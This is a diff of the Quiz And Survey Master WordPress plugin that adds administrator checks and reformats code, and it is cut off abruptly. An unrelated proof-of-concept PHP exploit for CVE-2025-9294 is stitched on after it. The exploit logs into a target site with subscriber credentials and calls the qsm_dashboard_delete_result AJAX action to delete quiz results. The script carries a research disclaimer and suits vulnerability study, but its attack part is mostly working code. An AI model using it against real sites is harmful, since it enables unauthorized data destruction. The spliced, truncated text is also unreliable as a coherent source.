+++ b/quiz-master-next/php/admin/admin-results-page.php
@@ -116,7 +116,7 @@
 	global $mlwQuizMasterNext;

 	// If nonce is correct, delete results.
-	if ( isset( $_POST['delete_results_nonce'] ) && wp_verify_nonce( sanitize_text_field( wp_unslash( $_POST['delete_results_nonce'] ) ), 'delete_results' ) ) {
+	if ( isset( $_POST['delete_results_nonce'] ) && wp_verify_nonce( sanitize_text_field( wp_unslash( $_POST['delete_results_nonce'] ) ), 'delete_results' ) && current_user_can( 'administrator' ) ) {

 		$mlw_delete_results_id   = isset( $_POST['result_id'] ) ? intval( $_POST['result_id'] ) : 0;
 		$mlw_delete_results_name = isset( $_POST['delete_quiz_name'] ) ? sanitize_text_field( wp_unslash( $_POST['delete_quiz_name'] ) ) : '';
@@ -140,9 +140,9 @@
 			$mlwQuizMasterNext->alertManager->newAlert( sprintf( __( 'There was an error when deleting this result. Error from WordPress: %s', 'quiz-master-next' ), $error ), 'error' );
 			$mlwQuizMasterNext->log_manager->add( 'Error deleting result', "Tried {$wpdb->last_query} but got $error.", 0, 'error' );
 		} else {
-			qsm_delete_results_attachments($row_before_update);
+			qsm_delete_results_attachments( $row_before_update );
 			$mlwQuizMasterNext->alertManager->newAlert( __( 'Your results has been deleted successfully.', 'quiz-master-next' ), 'success' );
-			$mlwQuizMasterNext->audit_manager->new_audit( "Results Has Been Deleted From:", $mlw_delete_results_name, "" );
+			$mlwQuizMasterNext->audit_manager->new_audit( 'Results Has Been Deleted From:', $mlw_delete_results_name, '' );
 		}
 	}

@@ -153,11 +153,11 @@
 		if ( isset( $_POST["delete_results"] ) && is_array( $_POST["delete_results"] ) ) {
 			$delete_results = array_map( 'sanitize_text_field', wp_unslash( $_POST["delete_results"] ) );
 			$table_name = $wpdb->prefix . 'mlw_results';
-			$query = $wpdb->prepare(
-				"SELECT * FROM $table_name WHERE result_id IN (" . implode(',', array_fill(0, count($delete_results), '%d')) . ")",
+			$query      = $wpdb->prepare(
+				"SELECT * FROM $table_name WHERE result_id IN (" . implode( ',', array_fill( 0, count( $delete_results ), '%d' ) ) . ')',
 				$delete_results
 			);
-			$row_before_update = $wpdb->get_results($query);
+			$row_before_update = $wpdb->get_results( $query );

 			// Cycle through the POST array which should be an array of the result ids of the results the user wishes to delete
 			foreach ( $delete_results as $result ) {
@@ -174,8 +174,8 @@
 					);
 				}
 			}
-			qsm_delete_results_attachments($row_before_update);
-			$mlwQuizMasterNext->audit_manager->new_audit( "Results Have Been Bulk Deleted", "", "" );
+			qsm_delete_results_attachments( $row_before_update );
+			$mlwQuizMasterNext->audit_manager->new_audit( 'Results Have Been Bulk Deleted', '', '' );
 		}
 	}

@@ -389,7 +389,7 @@
 			'view_result_page' => __( 'Result Page', 'quiz-master-next' ),
 		) );

-		$values      = $quiz_infos   = [];
+		$values      = $quiz_infos   = array();
 		foreach ( $th_elements as $key => $th ) {
 			$values[ $key ]['title'] = $th;
 			$values[ $key ]['style'] = "";
@@ -445,8 +445,7 @@
 				if ( isset( $values['score'] ) ) {
 					if ( 1 === intval( $form_type ) || 2 === intval( $form_type ) ) {
 						$values['score']['content'][] = esc_html__( 'Not Graded', 'quiz-master-next' );
-					} else {
-						if ( 0 === intval( $mlw_quiz_info->quiz_system ) ) {
+					} elseif ( 0 === intval( $mlw_quiz_info->quiz_system ) ) {
 							$values['score']['content'][] = sprintf( '%1$s %2$s %3$s %4$s %5$s', esc_html( $mlw_quiz_info->correct ), esc_html__( 'out of', 'quiz-master-next' ), esc_html( $out_of_q ), esc_html__( 'or', 'quiz-master-next' ), esc_html( $mlw_quiz_info->correct_score ) );
 						} elseif ( 1 === intval( $mlw_quiz_info->quiz_system ) ) {
 							$values['score']['content'][] = sprintf( '%1$s %2$s', esc_html( $mlw_quiz_info->point_score ), esc_html__( 'Points', 'quiz-master-next' ) );
@@ -454,7 +453,6 @@
 							$values['score']['content'][] = sprintf( '%1$s %2$s %3$s %4$s %5$s <br /> %6$s %7$s', esc_html( $mlw_quiz_info->correct ), esc_html__( 'out of', 'quiz-master-next' ), esc_html( $out_of_q ), esc_html__( 'or', 'quiz-master-next' ), esc_html( $mlw_quiz_info->correct_score ), esc_html( $mlw_quiz_info->point_score ), esc_html__( 'Points', 'quiz-master-next' ) );
 						} else {
 							$values['score']['content'][] = esc_html__( 'Not Graded', 'quiz-master-next' );
-						}
 					}
 				}

@@ -521,7 +519,7 @@
 					$values['view_result_page']['content'][] = '<a target="_blank" class="button" href="' . esc_url( $quiz_page_url ) . '?result_id=' . esc_attr( $unique_id ) . '">' . esc_html__( 'View', 'quiz-master-next' ) . '</a>';
 				}
 				foreach ( $values as $k => $v ) {
-					if ( ! in_array( $k, [ 'score', 'time_complete', 'name', 'business', 'email', 'phone', 'user', 'time_taken', 'ip', 'page_name', 'page_url', 'view_result_page' ], true ) ) {
+					if ( ! in_array( $k, array( 'score', 'time_complete', 'name', 'business', 'email', 'phone', 'user', 'time_taken', 'ip', 'page_name', 'page_url', 'view_result_page' ), true ) ) {
 						$content = apply_filters( 'mlw_qmn_admin_results_page_column_content', '', $mlw_quiz_info, $k );
 						if ( isset( $values[ $k ] ) && ! empty( $content ) ) {
 							$values[ $k ]['content'][] = $content;
@@ -564,7 +562,9 @@
 									if ( ( current_user_can( 'view_qsm_quiz_result' ) && get_current_user_id() == $quiz_infos[ $x ]->user ) || current_user_can( 'delete_others_qsm_quizzes' ) ) { ?>
 										<a href="admin.php?page=qsm_quiz_result_details&result_id=<?php echo esc_attr( $quiz_infos[ $x ]->result_id ); ?>"><?php esc_html_e( 'View', 'quiz-master-next' ); ?></a>
 									<?php } ?>
-									<a style="color: red;" class="delete_table_quiz_results_item" data-quiz-id="<?php echo esc_attr( $quiz_infos[ $x ]->result_id ); ?>" data-quiz-name="<?php echo esc_attr( $quiz_infos[ $x ]->quiz_name ); ?>" href='#'><?php esc_html_e( 'Delete', 'quiz-master-next' ); ?></a>
+									<?php if ( current_user_can('administrator') ) { ?>
+										<a style="color: red;" class="delete_table_quiz_results_item" data-quiz-id="<?php echo esc_attr( $quiz_infos[ $x ]->result_id ); ?>" data-quiz-name="<?php echo esc_attr( $quiz_infos[ $x ]->quiz_name ); ?>" href='#'><?php esc_html_e( 'Delete', 'quiz-master-next' ); ?></a>
+									<?php } ?>
 									<?php if ( ! class_exists( 'QSM_Proctoring_Quiz' ) ) { ?>
 										<a class="qsm-quiz-proctor-addon" href="#"><?php esc_html_e( 'Proctor Reports', 'quiz-master-next' ); ?></a>
 									<?php } ?>
@@ -595,30 +595,30 @@
 			</tbody>
 		</table>
 	</form>
-
-	<div class="qsm-popup qsm-popup-slide qsm-standard-popup " id="qsm-delete-result-page-popup" aria-hidden="false"  style="display:none">
-		<div class="qsm-popup__overlay" tabindex="-1" data-micromodal-close>
-			<div class="qsm-popup__container" role="dialog" aria-modal="true">
-				<form action='' method='post'>
-					<header class="qsm-popup__header qsm-delete-result-page-popup-header">
-						<div class="qsm-popup__title qsm-upgrade-box-title" id="modal-2-title"></div>
-						<a class="qsm-popup__close qsm-popup-upgrade-close" aria-label="Close modal" data-micromodal-close></a>
-					</header>
-					<main class="qsm-popup__content" id="modal-2-content">
-						<div class="qsm-result-page-delete-message"><?php esc_html_e( 'Are you sure you want to delete these results?', 'quiz-master-next' ); ?></div>
-							<?php wp_nonce_field( 'delete_results', 'delete_results_nonce' ); ?>
-							<input type='hidden' id='result_id' name='result_id' value='' />
-							<input type='hidden' id='delete_quiz_name' name='delete_quiz_name' value='' />
-					</main>
-					<footer class="qsm-popup__footer">
-						<button class="qsm-popup__btn" data-micromodal-close aria-label="Close this dialog window"><?php esc_html_e( 'Cancel', 'quiz-master-next' ); ?></button>
-						<button type="submit" class="qsm-popup__btn qsm-delete-result-popup-btn"><span class="dashicons dashicons-warning"></span><?php esc_html_e( 'Delete Result', 'quiz-master-next' ); ?></button>
-					</footer>
-				</form>
+	<?php if ( current_user_can('administrator') ) { ?>
+		<div class="qsm-popup qsm-popup-slide qsm-standard-popup " id="qsm-delete-result-page-popup" aria-hidden="false"  style="display:none">
+			<div class="qsm-popup__overlay" tabindex="-1" data-micromodal-close>
+				<div class="qsm-popup__container" role="dialog" aria-modal="true">
+					<form action='' method='post'>
+						<header class="qsm-popup__header qsm-delete-result-page-popup-header">
+							<div class="qsm-popup__title qsm-upgrade-box-title" id="modal-2-title"></div>
+							<a class="qsm-popup__close qsm-popup-upgrade-close" aria-label="Close modal" data-micromodal-close></a>
+						</header>
+						<main class="qsm-popup__content" id="modal-2-content">
+							<div class="qsm-result-page-delete-message"><?php esc_html_e( 'Are you sure you want to delete these results?', 'quiz-master-next' ); ?></div>
+								<?php wp_nonce_field( 'delete_results', 'delete_results_nonce' ); ?>
+								<input type='hidden' id='result_id' name='result_id' value='' />
+								<input type='hidden' id='delete_quiz_name' name='delete_quiz_name' value='' />
+						</main>
+						<footer class="qsm-popup__footer">
+							<button class="qsm-popup__btn" data-micromodal-close aria-label="Close this dialog window"><?php esc_html_e( 'Cancel', 'quiz-master-next' ); ?></button>
+							<button type="submit" class="qsm-popup__btn qsm-delete-result-popup-btn"><span class="dashicons dashicons-warning"></span><?php esc_html_e( 'Delete Result', 'quiz-master-next' ); ?></button>
+						</footer>
+					</form>
+				</div>
 			</div>
 		</div>
-	</div>
-
+	<?php } ?>
 	<!-- Popup for screen options -->
 	<div class="qsm-popup qsm-popup-slide" id="modal-results-screen-option" aria-hidden="true">
 		<div class="qsm-popup__overlay" tabindex="-1" data-micromodal-close>
@@ -678,7 +678,7 @@
 			"id"           => 'modal-proctor-quiz',
 			"title"        => __('Secure Your Quizzes with Proctoring', 'quiz-master-next'),
 			"description"  => __('Monitor and prevent cheating with the Quiz Proctor Addon.', 'quiz-master-next'),
-			"chart_image"  => plugins_url('', dirname(__FILE__)) . '/images/proctor_quiz_chart.png',
+			"chart_image"  => plugins_url('', __DIR__) . '/images/proctor_quiz_chart.png',
 			"information"  => __('QSM Addon Bundle is the best way to get all our add-ons at a discount. Upgrade to save 95% today OR you can buy Quiz Proctor Addon separately.', 'quiz-master-next'),
 			"buy_btn_text" => __('Buy Quiz Proctor Addon', 'quiz-master-next'),
 			"doc_link"     => qsm_get_plugin_link( 'docs/add-ons/quiz-proctor/', 'quiz-documentation', 'plugin', 'quiz-proctor', 'qsm_plugin_upsell' ),
@@ -701,7 +701,7 @@
 		"id"           => 'export-results',
 		"title"        => __( 'Effortlessly Export Quiz Data', 'quiz-master-next' ),
 		"description"  => __( 'Manage quiz results with the Export Results Addon.', 'quiz-master-next' ),
-		"chart_image"  => plugins_url( '', dirname( __FILE__ ) ) . '/images/export_results.png',
+		"chart_image"  => plugins_url( '', __DIR__ ) . '/images/export_results.png',
 		"warning"      => __( 'Export Results Addon required', 'quiz-master-next' ),
 		"information"  => __( 'QSM Addon Bundle is the best way to get all our add-ons at a discount. Upgrade to save 95% today. OR you can buy Export Results Addon separately.', 'quiz-master-next' ),
 		"buy_btn_text" => __( 'Buy Export Results Addon', 'quiz-master-next' ),
@@ -721,7 +721,7 @@
 		"id"           => 'reporting-analysis',
 		"title"        => __( 'Gain Powerful Insights with In-Depth Reports', 'quiz-master-next' ),
 		"description"  => __( 'Analyze performance trends with the Reporting & Analysis Addon.', 'quiz-master-next' ),
-		"chart_image"  => plugins_url( '', dirname( __FILE__ ) ) . '/images/report_analysis_chart.png',
+		"chart_image"  => plugins_url( '', __DIR__ ) . '/images/report_analysis_chart.png',
 		"warning"      => __( 'Reporting & Analysis Addon required', 'quiz-master-next' ),
 		"information"  => __( 'QSM Addon Bundle is the best way to get all our add-ons at a discount. Upgrade to save 95% today. OR you can buy Reporting & Analysis Addon separately.', 'quiz-master-next' ),
 		"buy_btn_text" => __( 'Buy Reporting & Analysis Addon', 'quiz-master-next' ),
@@ -742,7 +742,7 @@
 		"id"           => 'proctoring-quiz',
 		"title"        => __('Secure Your Quizzes with Proctoring', 'quiz-master-next'),
 		"description"  => __('Monitor and prevent cheating with the Quiz Proctor Addon.', 'quiz-master-next'),
-		"chart_image"  => plugins_url( '', dirname( __FILE__ ) ) . '/images/proctor_quiz_chart.png',
+		"chart_image"  => plugins_url( '', __DIR__ ) . '/images/proctor_quiz_chart.png',
 		"warning"      => __( 'Missing Feature - Quiz Proctor Add-on required', 'quiz-master-next' ),
 		"information"  => __( 'QSM Addon Bundle is the best way to get all our add-ons at a discount. Upgrade to save 95% today. OR you can buy Proctoring Quiz Addon separately.', 'quiz-master-next' ),
 		"buy_btn_text" => __( 'Buy Quiz Proctor Addon', 'quiz-master-next' ),
--- a/quiz-master-next/php/admin/create-quiz-page.php
+++ b/quiz-master-next/php/admin/create-quiz-page.php
@@ -6,24 +6,24 @@
 function qsm_activate_plugin_ajax_activate_plugin() {
     // Check if the user has permission to activate plugins
     if ( ! current_user_can('activate_plugins') ) {
-        wp_send_json_error([ 'message' => 'Permission denied.' ]);
+        wp_send_json_error(array( 'message' => 'Permission denied.' ));
         wp_die();
     }
     check_ajax_referer('qsm_installer_nonce', 'nonce');
     if ( empty($_POST['plugin_path']) ) {
-        wp_send_json_error([ 'message' => 'No plugin path provided.' ]);
+        wp_send_json_error(array( 'message' => 'No plugin path provided.' ));
         wp_die();
     }
     $plugin_path = isset($_POST['plugin_path']) ? sanitize_text_field(wp_unslash( $_POST['plugin_path'] ) ) : "";
     $result = activate_plugin($plugin_path);
-	wp_send_json_success([ 'message' => 'Plugin activated successfully.' ]);
+	wp_send_json_success(array( 'message' => 'Plugin activated successfully.' ));
     wp_die();
 }

 function qsm_activate_plugin_ajax_handler() {
     // Check if the user has permission to activate plugins
     if ( ! current_user_can('activate_plugins') ) {
-        wp_send_json_error([ 'message' => 'Permission denied.' ]);
+        wp_send_json_error(array( 'message' => 'Permission denied.' ));
         wp_die();
     }

@@ -38,9 +38,9 @@

     $all_plugins = get_plugins();
 	if ( isset($all_plugins[ $plugin_path ]) ) {
-		wp_send_json_success([ 'version' => esc_html__('Version: ', 'quiz-master-next') . $all_plugins[ $plugin_path ]['Version'] ]);
+		wp_send_json_success(array( 'version' => esc_html__('Version: ', 'quiz-master-next') . $all_plugins[ $plugin_path ]['Version'] ));
 	} else {
-		wp_send_json_error([ 'message' => 'Plugin not found.' ]);
+		wp_send_json_error(array( 'message' => 'Plugin not found.' ));
 	}
     wp_die();
 }
@@ -59,7 +59,7 @@
 	global $wpdb;
 	$query = $wpdb->prepare("SELECT id FROM {$wpdb->prefix}mlw_themes WHERE theme = %s", $theme_slug);
 	$id = $wpdb->get_var($query);
-	wp_send_json_success([ 'id' => $id ]);
+	wp_send_json_success(array( 'id' => $id ));
     wp_die();
 }

@@ -74,7 +74,7 @@
 	}

 	// Filter active themes to ensure their directories exist
-	$filtered_active_themes = [];
+	$filtered_active_themes = array();
 	if ( ! empty($active_themes) ) {
 		foreach ( $active_themes as $theme ) {
 			$theme_dir = WP_PLUGIN_DIR . '/' . $theme['theme'];
@@ -85,7 +85,7 @@
 	}

 	// Merge installed themes and filtered active themes
-	$merged_themes = [];
+	$merged_themes = array();
 	foreach ( array_merge($installed_themes, $filtered_active_themes) as $theme ) {
 		$key = $theme['theme'];
 		if ( ! isset($merged_themes[ $key ]) ) {
@@ -176,12 +176,12 @@
 						foreach ( $all_addons as $addon ) {
 							if ( $addon['id'] == $theme_value['id'] ) {
 								// Merge the additional keys into the theme array
-								$theme_value = array_merge($theme_value, [
+								$theme_value = array_merge($theme_value, array(
 									'path'         => $addon['path'],
 									'icon'         => $addon['icon'],
 									'settings_tab' => $addon['settings_tab'],
 									'option'       => $addon['option'],
-								]);
+								));
 								break; // Stop looping once a match is found
 							}
 						}
@@ -439,28 +439,28 @@
 							$all_addons = $qsm_admin_dd['all_addons'];
 							$all_themes = $qsm_admin_dd['themes'];

-							$dashboard_pages = [
-								[
+							$dashboard_pages = array(
+								array(
 									'page_no'  => 1,
 									'callback' => 'qsm_dashboard_display_quizoptions_section',
-									'params'   => [ $quizoptions_boxes ],
-								],
-								[
+									'params'   => array( $quizoptions_boxes ),
+								),
+								array(
 									'page_no'  => 2,
 									'callback' => 'qsm_dashboard_display_theme_section',
-									'params'   => [ $all_themes, $installer_option, $invalid_and_expired, $all_addons, $installer_activated, $installer_script ],
-								],
-								[
+									'params'   => array( $all_themes, $installer_option, $invalid_and_expired, $all_addons, $installer_activated, $installer_script ),
+								),
+								array(
 									'page_no'  => 3,
 									'callback' => 'qsm_dashboard_display_addons_section',
-									'params'   => [ $all_addons, $installer_option, $invalid_and_expired, $installer_activated, $installer_script ],
-								],
-								[
+									'params'   => array( $all_addons, $installer_option, $invalid_and_expired, $installer_activated, $installer_script ),
+								),
+								array(
 									'page_no'  => 4,
 									'callback' => 'qsm_dashboard_display_quizform_section',
-									'params'   => [],
-								],
-							];
+									'params'   => array(),
+								),
+							);

 							foreach ( $dashboard_pages as $page ) {
 								echo '<div class="qsm-dashboard-container-pages" data-page-no="' . esc_attr($page['page_no']) . '" style="display: none;">';
@@ -490,5 +490,4 @@
 		</div><!-- qsm-new-quiz-wrapper -->
 	</div>
 	<?php
-
 }
 No newline at end of file
--- a/quiz-master-next/php/admin/functions.php
+++ b/quiz-master-next/php/admin/functions.php
@@ -1101,7 +1101,7 @@
 		"id"           => 'modal-advanced-question-type',
 		"title"        => __('Go Beyond Standard Questions', 'quiz-master-next'),
 		"description"  => __('Make your quizzes more engaging with the Advanced Question Types Addon.', 'quiz-master-next'),
-		"chart_image"  => plugins_url('', dirname(__FILE__)) . '/images/advanced_question_type.png',
+		"chart_image"  => plugins_url('', __DIR__) . '/images/advanced_question_type.png',
 		"information"  => __('QSM Addon Bundle is the best way to get all our add-ons at a discount. Upgrade to save 95% today OR you can buy Advanced Question Addon separately.', 'quiz-master-next'),
 		"buy_btn_text" => __('Buy Advanced Questions Addon', 'quiz-master-next'),
 		"doc_link"     => qsm_get_plugin_link( 'docs/question-types', 'qsm_list', 'advance-question_type', 'advance-question-upsell_read_documentation', 'qsm_plugin_upsell' ),
@@ -1233,8 +1233,6 @@
 }

 /**
- * Generates theme setting feilds
- *
  * @since 8.0.5
  * @param string $type input type
 * @return string $label input label
@@ -1422,12 +1420,11 @@
 			'selected' => array(),
 		),
 	);
-	echo sprintf(
+	printf(
 		'<select name="%1$s" class="qsm-theme-option-unit"> %2$s </select>',
 		esc_attr( $param['name'] ),
 		wp_kses( $options, $allowed_tags )
 	);
-
 }

 function qsm_get_input_label_selected( $param ) {
@@ -1459,7 +1456,7 @@
             'selected' => array(),
         ),
     );
-    echo sprintf(
+    printf(
         '<select name="%1$s"> %2$s </select>',
         esc_attr( $param['name'] ),
         wp_kses( $options ,$allowed_tags)
@@ -1476,7 +1473,7 @@
 				"id"           => 'advanced-assessment',
 				"title"        => __( 'Advanced Assessment, Smarter Results', 'quiz-master-next' ),
 				"description"  => __( 'Unlock Personalized Quiz Experiences with the Advanced Assessment Addon.', 'quiz-master-next' ),
-				"chart_image"  => plugins_url( '', dirname( __FILE__ ) ) . '/images/advance-assessment-chart.png',
+				"chart_image"  => plugins_url( '', __DIR__ ) . '/images/advance-assessment-chart.png',
 				"warning"      => __( 'Missing Feature - Advanced Assessment Add-on required', 'quiz-master-next' ),
 				"information"  => __( 'Get all our add-ons at a discounted rate with the QSM Addon Bundle and save up to 95% today! Alternatively, you can also purchase the Advanced Assessment Addon separately.', 'quiz-master-next' ),
 				"buy_btn_text" => __( 'Buy Quiz Advanced Assessment', 'quiz-master-next' ),
@@ -1501,7 +1498,7 @@
 			"id"           => 'modal-extra-shortcodes',
 			"title"        => __('Unlock More Customization with Extra Shortcodes', 'quiz-master-next'),
 			"description"  => __('Enhance quiz display and functionality with the Extra Shortcodes Addon.', 'quiz-master-next'),
-			"chart_image"  => plugins_url('', dirname(__FILE__)) . '/images/extra-shortcodes.png',
+			"chart_image"  => plugins_url('', __DIR__) . '/images/extra-shortcodes.png',
 			"information"  => __('QSM Addon Bundle is the best way to get all our add-ons at a discount. Upgrade to save 95% today OR you can buy QSM Extra Shortodes Addon separately.', 'quiz-master-next'),
 			"buy_btn_text" => __('Buy QSM Extra Shortodes Addon', 'quiz-master-next'),
 			"doc_link"     => qsm_get_plugin_link( 'docs/add-ons/extra-shortcodes/', 'qsm_list', 'extrashortcodea_button', 'extra-shortcodes-upsell_read_documentation', 'qsm_plugin_upsell' ),
@@ -1528,7 +1525,7 @@
 			"id"           => 'modal-qsm-webhooks',
 			"title"        => __( 'Automate Your Workflow with QSM Webhooks', 'quiz-master-next' ),
 			"description"  => __( 'Enhance your quizzes with seamless integrations using the QSM Webhooks Addon.', 'quiz-master-next' ),
-			"chart_image"  => plugins_url( '', dirname( __FILE__ ) ) . '/images/proctor_quiz_chart.png',
+			"chart_image"  => plugins_url( '', __DIR__ ) . '/images/proctor_quiz_chart.png',
 			"warning"      => __( 'Missing Feature - webhook Add-On required', 'quiz-master-next' ),
 			"information"  => __( 'QSM Addon Bundle is the best way to get all our add-ons at a discount. Upgrade to save 95% today. OR you can buy Webhooks Addon separately.', 'quiz-master-next' ),
 			"buy_btn_text" => __( 'Buy Webhooks Addon', 'quiz-master-next' ),
@@ -1626,7 +1623,7 @@
 			}
 		}
 	} else {
-		wp_send_json_error( [ 'message' => __( 'Invalid nonce. Busted.', 'quiz-master-next' ) ] );
+		wp_send_json_error( array( 'message' => __( 'Invalid nonce. Busted.', 'quiz-master-next' ) ) );
         wp_die();
 	}
 }
@@ -1643,22 +1640,22 @@
 	if ( ! isset( $_POST['nonce'] ) ||
         ! wp_verify_nonce( sanitize_text_field( wp_unslash( $_POST['nonce'] ) ), 'qsm_remove_template' )
     ) {
-        wp_send_json_error( [ 'message' => __( 'Invalid nonce. Action not authorized.', 'quiz-master-next' ) ] );
+        wp_send_json_error( array( 'message' => __( 'Invalid nonce. Action not authorized.', 'quiz-master-next' ) ) );
         wp_die();
     }

     if ( ! isset( $_POST['id'] ) || ! absint( wp_unslash( $_POST['id'] ) ) ) {
-        wp_send_json_error( [ 'message' => __( 'Invalid template ID.', 'quiz-master-next' ) ] );
+        wp_send_json_error( array( 'message' => __( 'Invalid template ID.', 'quiz-master-next' ) ) );
         wp_die();
     }

     $template_id = absint( wp_unslash( $_POST['id'] ) );
     $table_name = $wpdb->prefix . 'mlw_quiz_output_templates';
-    $result = $wpdb->delete( $table_name, [ 'id' => $template_id ], [ '%d' ] );
+    $result = $wpdb->delete( $table_name, array( 'id' => $template_id ), array( '%d' ) );
     if ( $result ) {
-        wp_send_json_success( [ 'message' => __( 'Template removed successfully.', 'quiz-master-next' ) ] );
+        wp_send_json_success( array( 'message' => __( 'Template removed successfully.', 'quiz-master-next' ) ) );
     } else {
-        wp_send_json_error( [ 'message' => __( 'Failed to remove the template.', 'quiz-master-next' ) ] );
+        wp_send_json_error( array( 'message' => __( 'Failed to remove the template.', 'quiz-master-next' ) ) );
     }
     wp_die();
 }
@@ -1714,7 +1711,7 @@
 									</div>
 									<div class="qsm-<?php echo esc_attr( $type ); ?>-page-template-card-buttons">
 										<button class="qsm-<?php echo esc_attr( $type ); ?>-page-template-preview-button button button-secondary" data-indexid="<?php echo esc_html($key); ?>"><?php esc_html_e( 'Preview', 'quiz-master-next' ); ?></button>
-										<button class="qsm-<?php echo esc_attr( $type ); ?>-page-template-use-button button button-secondary" data-structure="default" data-indexid="<?php echo esc_html($key); ?>"><img class="qsm-common-svg-image-class" src="<?php echo esc_url(QSM_PLUGIN_URL . 'assets/download-line-blue.svg'); ?>" alt="download-line-blue.svg" /><?php esc_html_e( 'Insert', 'quiz-master-next' ); ?></button>
+										<button class="qsm-<?php echo esc_attr( $type ); ?>-page-template-use-button" data-structure="default" data-indexid="<?php echo esc_html($key); ?>"><img class="qsm-common-svg-image-class" src="<?php echo esc_url(QSM_PLUGIN_URL . 'assets/download-line-blue.svg'); ?>" alt="download-line-blue.svg" /><?php esc_html_e( 'Insert', 'quiz-master-next' ); ?></button>
 									</div>
 								</div>
 								<?php
@@ -1781,9 +1778,9 @@
 }

 function qsm_get_plugin_status_by_path( $path ) {
-	if ( is_plugin_active($path) ) {
+	if ( is_plugin_active( $path ) ) {
 		return 'activated';
-	} elseif ( '' != $path && file_exists(WP_PLUGIN_DIR . '/' . $path) ) {
+	} elseif ( ! empty( $path ) && file_exists( WP_PLUGIN_DIR . '/' . $path ) ) {
 		return 'installed';
 	} else {
 		return 'not_installed';
@@ -1798,39 +1795,39 @@
  */
 function qsm_get_dependency_plugin_list() {
 	$qsm_admin_dd = qsm_get_parsing_script_data();
-	$all_addons = isset( $qsm_admin_dd['all_addons'] ) ? $qsm_admin_dd['all_addons'] : array();
+	$all_addons   = isset( $qsm_admin_dd['all_addons'] ) ? $qsm_admin_dd['all_addons'] : array();

 	$dependency_array = array();

 	foreach ( $all_addons as $key => $addon ) {
-		$path = $addon['path'] ?? '';
-		$addon_link          = qsm_get_utm_link( $addon['link'], 'result_or_email', 'templates', 'template_preview_' . sanitize_title( $addon['name'] ) );
-		$dependency_array[] = [
+		$path       = isset( $addon['path'] ) ? $addon['path'] : '';
+		$addon_link = qsm_get_utm_link( $addon['link'], 'result_or_email', 'templates', 'template_preview_' . sanitize_title( $addon['name'] ) );
+		$dependency_array[] = array(
 			'id'     => $addon['id'],
 			'name'   => $addon['name'],
 			'link'   => $addon_link,
-			'status' => qsm_get_plugin_status_by_path($path), // Use the common function
-		];
+			'status' => qsm_get_plugin_status_by_path( $path ), // Use the common function
+		);
 	}

 	return $dependency_array;
 }
 function qsm_create_theme_defaults_tab() {
 	global $mlwQuizMasterNext, $wpdb;
-    $themes = $wpdb->get_results( "SELECT * FROM {$wpdb->prefix}mlw_themes", ARRAY_A );
+	$themes = $wpdb->get_results( "SELECT * FROM {$wpdb->prefix}mlw_themes", ARRAY_A );
 	if ( empty( $themes ) ) {
 		return;
 	}
 	$active_themes   = $mlwQuizMasterNext->theme_settings->get_active_themes();

-	if ( empty($active_themes) ) {
+	if ( empty( $active_themes ) ) {
 		return;
 	}
 	$pro_themes = array( 'Fortune', 'Sigma', 'Pixel', 'Sapience', 'Breeze', 'Fragrance', 'Pool', 'Ivory' );

 	$has_pro_theme = false;
 	foreach ( $active_themes as $theme ) {
-		if ( in_array($theme['theme_name'], $pro_themes, true) ) {
+		if ( in_array( $theme['theme_name'], $pro_themes, true ) ) {
 			$has_pro_theme = true;
 			break;
 		}
--- a/quiz-master-next/php/admin/options-page-questions-tab.php
+++ b/quiz-master-next/php/admin/options-page-questions-tab.php
@@ -30,7 +30,7 @@
  */
 function qsm_options_questions_tab_content() {
 	global $wpdb, $mlwQuizMasterNext;
-	$quiz_data           = $wpdb->get_results( "SELECT quiz_id, quiz_name	FROM " . $wpdb->prefix . "mlw_quizzes WHERE deleted=0 ORDER BY quiz_id DESC" );
+	$quiz_data           = $wpdb->get_results( 'SELECT quiz_id, quiz_name	FROM ' . $wpdb->prefix . 'mlw_quizzes WHERE deleted=0 ORDER BY quiz_id DESC' );
 	$question_categories = $wpdb->get_results( "SELECT DISTINCT category FROM {$wpdb->prefix}mlw_questions", 'ARRAY_A' );
 	$enabled             = get_option( 'qsm_multiple_category_enabled' );

@@ -66,26 +66,26 @@
 			'questions'    => array(),
 		);
 		foreach ( $pages as $k => $val ) {
-			$qpage                   = isset( $db_qpages[ $k ] ) ? $db_qpages[ $k ] : $defaultQ

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-9294 - Quiz And Survey Master <= 10.3.1 - Missing Authorization to Authenticated (Subscriber+) Quiz Results Deletion

<?php
/**
 * Proof of Concept for CVE-2025-9294
 * Requires valid WordPress Subscriber credentials
 */

$target_url = 'https://vulnerable-site.com';
$username = 'subscriber_user';
$password = 'subscriber_pass';
$result_id = 123; // Target quiz result ID to delete

// Initialize cURL session for WordPress login
$ch = curl_init();

// Step 1: Authenticate to WordPress and obtain cookies
$login_url = $target_url . '/wp-login.php';
$login_fields = [
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1'
];

curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_fields));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);

$response = curl_exec($ch);

// Step 2: Exploit the vulnerable AJAX endpoint
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';
$exploit_fields = [
    'action' => 'qsm_dashboard_delete_result',
    'result_id' => $result_id
];

curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($exploit_fields));

$ajax_response = curl_exec($ch);

// Check if exploitation succeeded
if (strpos($ajax_response, 'success') !== false || strpos($ajax_response, 'deleted') !== false) {
    echo "[+] Successfully deleted quiz result ID: $result_idn";
